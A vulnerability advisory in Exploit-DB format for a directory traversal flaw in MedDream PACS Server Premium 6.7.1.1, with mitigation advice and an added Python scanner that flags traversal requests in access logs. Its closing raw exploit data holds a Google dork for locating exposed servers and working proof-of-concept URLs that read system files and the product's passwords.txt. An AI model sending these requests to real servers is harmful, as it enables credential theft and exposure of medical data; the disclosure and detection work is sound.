Vendor: MedDream PACS Server Premium
By: Carlos Avila
CVSS: 8.8 (HIGH)
Type: Directory Traversal
CWE: 22
Product Name: MedDream PACS Server Premium
Affected Version From: 6.7.1.1
Affected Version To: 6.7.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:softneta:meddream_pacs_server_premium:6.7.1.1
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
Year: 2018

Softneta MedDream PACS Server Premium 6.7.1.1 – Directory Traversal

Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to directory traversal. An attacker can exploit the flaw by sending a crafted HTTP request containing directory traversal sequences (e.g. '../../../../../../../../../../') to the vulnerable server. This allows access to sensitive files and directories stored outside the web root folder. The attacker can also bypass authentication and obtain private information, including users and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated to prevent directory traversal attacks.
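
A defensive check for the request pattern in the proof of concept, added here as an example (not code from MedDream or the exploit author): it decodes the `path` parameter of nocache.php, resolves it with Windows path rules, and flags access-log requests that land outside the served directory. The base directory `C:\webroot\pacs`, the log format and the sample log lines are assumptions constructed for illustration.

```python
import ntpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

BASE = r"C:\webroot\pacs"  # assumed directory nocache.php should be confined to
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IPs), modelled on the PoC requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/May/2018:10:00:01 +0000] "GET /pacs/nocache.php?path=images%5cthumb%5c1.jpg HTTP/1.1" 200 5120',
    '192.0.2.44 - - [23/May/2018:10:00:07 +0000] "GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1" 200 92',
    '192.0.2.44 - - [23/May/2018:10:00:09 +0000] "GET /Pacs/nocache.php?path=..%5c..%5c..%5cMedDreamPACS-Premium%5cpasswords.txt HTTP/1.1" 200 310',
    '192.0.2.10 - - [23/May/2018:10:00:12 +0000] "GET /pacs/login.php HTTP/1.1" 200 2048',
]

def fully_decode(value, rounds=3):
    """Percent-decode until stable, so the check sees the final characters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(user_path, base=BASE):
    """True if user_path, resolved with Windows path rules, lands outside base."""
    path = fully_decode(user_path).replace("/", "\\")
    resolved = ntpath.normcase(ntpath.normpath(ntpath.join(base, path)))
    root = ntpath.normcase(ntpath.normpath(base))
    return not (resolved == root or resolved.startswith(root + "\\"))

def scan(lines):
    """Return (line_number, decoded path) for nocache.php requests leaving BASE."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQ.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/nocache.php"):
            continue
        for raw in parse_qs(url.query).get("path", []):
            if escapes_base(raw):
                hits.append((number, fully_decode(raw)))
    return hits

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: path escapes {BASE}: {path!r}")
```

The containment test in `escapes_base` compares the resolved path rather than searching for `..`, so encoded backslashes, rooted paths and drive letters are all caught by the same rule.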

Exploit-DB raw data:

# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
# Date: 2018-05-23
# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html
# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
# Version: MedDream PACS Server Premium 6.7.1.1
# Category: webapps
# Tested on: Windows 7 
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
  
# Proof of Concept

http://TARGET/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini

http://TARGET/Pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows\System32\drivers\etc\hosts

http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- )